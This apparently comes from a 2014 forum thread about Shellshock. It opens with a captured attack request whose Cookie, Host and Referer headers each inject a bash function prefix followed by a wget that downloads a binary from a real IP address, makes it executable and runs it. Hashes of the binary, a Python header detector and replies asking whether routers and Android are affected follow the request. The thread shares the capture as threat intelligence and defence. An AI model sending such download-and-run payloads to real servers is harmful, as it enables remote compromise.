GET./.HTTP/1.0
.User-Agent:.Thanks-Rob
.Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Host:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Referer:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Accept:.*/*
$ file nginx
nginx: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.18, stripped
$ md5sum nginx
5924bcc045bb7039f55c6ce29234e29a nginx
$ sha256sum nginx
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx
Looking at string variables, it appears to be a kernel exploit with a CnC component.
- found by @yinettesys
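
A defensive check for the request pattern in the capture above, as an added example that is not part of the original post: it flags any HTTP header whose value begins with a bash function definition (`() {`), the marker shared by the Cookie, Host and Referer headers. The function names and the sample request are constructed for illustration, and the sample's trailing command is a harmless placeholder.

```python
import re

# A header value that starts with "() {" is what a CGI server would hand to
# bash as an exported function definition. The pattern tolerates extra
# whitespace, so it errs on the side of flagging.
FUNC_PREFIX = re.compile(r"^\s*\(\s*\)\s*\{")

# Constructed sample modelled on the capture above (note the missing space
# after the colon). The command after the prefix is a placeholder.
SAMPLE_REQUEST = (
    "GET / HTTP/1.0\r\n"
    "User-Agent: Thanks-Rob\r\n"
    "Cookie:() { :; }; echo constructed-sample\r\n"
    "Host:() { :; }; echo constructed-sample\r\n"
    "Referer:() { :; }; echo constructed-sample\r\n"
    "Accept: */*\r\n"
    "\r\n"
)


def parse_headers(raw):
    """Return (name, value) pairs from the header block of a raw request."""
    headers = []
    for line in raw.splitlines()[1:]:      # skip the request line
        if not line:
            break                          # blank line ends the header block
        if line[0] in " \t" and headers:
            # Obsolete line folding: continuation of the previous value.
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip())
            continue
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip(), value.strip()))
    return headers


def suspicious_headers(raw):
    """Names of headers whose value begins with a function definition."""
    return [n for n, v in parse_headers(raw) if FUNC_PREFIX.match(v)]


if __name__ == "__main__":
    for name in suspicious_headers(SAMPLE_REQUEST):
        print("function-definition prefix in header:", name)
```
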
1
kfll 2014-09-27 10:22:41 +08:00 via Android
…As far as my limited understanding goes, it seems anything that has bash is affected… Android has it, for example…
2
zhujinliang 2014-09-27 10:27:37 +08:00
Has anyone tested whether router firmware such as OpenWrt is affected? It uses busybox, and luci is a CGI program.
3
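palxex OP
@kfll Thanks, I found this information too. But the Xiaomi I have on hand doesn't have it, and neither does the HiWiFi (极路由) router at home, though both have busybox ash. What I'm worried about is whether this post is saying that busybox itself has been compromised?
@zhujinliang I tested the HiWiFi 1 at home (SSH is enabled, so I can look at the file system). Testing with that dumper code from WooYun showed no problem, but I can't test any deeper than that; after all, I'm not a professional.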